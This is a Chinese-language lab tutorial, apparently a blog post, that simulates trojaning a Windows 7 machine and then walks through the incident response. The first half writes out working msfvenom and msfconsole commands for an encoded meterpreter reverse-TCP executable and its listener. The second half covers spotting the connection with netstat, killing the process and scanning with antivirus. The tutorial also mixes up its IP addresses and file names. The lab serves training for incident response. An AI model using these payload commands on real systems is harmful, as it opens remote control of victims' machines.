应急响应-模拟服务器挂马后的应急相关操作

工具:

攻击机:

kail:192.168.108.131

kail下载地址:https://mirrors.aliyun.com/kali-images/kali-2021.3/kali-linux-2021.3-live-i386.iso

靶机:

windows 7: 192.168.108.132

1、在kali中制作木马文件:vhost.exe,放置在kali的网站目录下:/var/www/html

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.188.134 LPORT=9999 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/vhosts.exe

2、开启apache服务,模拟受害者访问攻击者木马文件所在的网址,并下载木马文件

systemctl start apache2

netstat -ntpl

3、在kali上启动msf控制器,并选择相关模块,设置目标ip和端口

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options

set lhost 192.168.188.134

set lport 9999

4、在攻击机执行run命令监听端口,在靶机访问攻击机IP下载木马文件

kail:run

windows 7:http://192.168.108.131/vhost.exe

5、双击运行木马文件,然后回到攻击机发现连接成功

以上步骤模拟服务器挂马操作

6、现在受害者发现自己电脑中了木马,进行应急排查

netstat -ano | more

首先执行该命令来查看电脑运行程序有哪些存在异常,这里发现有个程序连接了一个外部IP,存在是木马的嫌疑,因此需要进一步测定。

7、打开任务管理器找到该PID对应的进程,首先结束该进程。

结束该进程后,kali与靶机连接中断

8、然后找到该进程对应的程序,接着使用一些杀毒软件检测该程序是否为木马。

经检测该程序确实为木马,删除该程序即可。在该模拟中则应急结束,然而在实际情况中还需要查出漏洞点,修复该漏洞,安装杀毒软件以及防火墙后应急结束。

总结

windows木马排查方向

1、可能通过网络连接观察异常的端口或者IP通信

2、可以通过任务管理器,详细信息,找到异常文件,使用杀毒软件检测

防御:

1、开启windows 防火墙

2、安装正版杀毒软件

相关推荐
2301_780303908 小时前
网络安全、自动化运维、ERP、CRM、MES
运维·web安全·网络安全·自动化·安全威胁分析
学逆向的9 小时前
汇编——内存
开发语言·汇编·算法·网络安全
学逆向的13 小时前
汇编——位运算
开发语言·汇编·算法·网络安全
数据知道15 小时前
安全报告怎么写才专业:渗透测试报告模板与踩坑
安全·网络安全·漏洞修复·安全报告·渗透测试报告
福来阁86号技师17 小时前
2026-now 网络安全笔记
网络安全·ctf·awd
编程(变成)小辣鸡19 小时前
如何防止接口被恶意刷?
java·后端·网络安全
ylscode1 天前
OpenSSH 10.4 正式发布:后量子加密落地,多项高危漏洞得到修复
网络·安全·网络安全
HackTwoHub1 天前
ARL灯塔重构版:支持APP/小程序/WEB资产同步扫描
人工智能·安全·web安全·网络安全·小程序·重构·自动化
ccino .1 天前
Hackerone-地址栏xss
网络安全·xss
数据知道1 天前
网络安全工具箱:100+ 工具分类速查与选型建议
安全·web安全·网络安全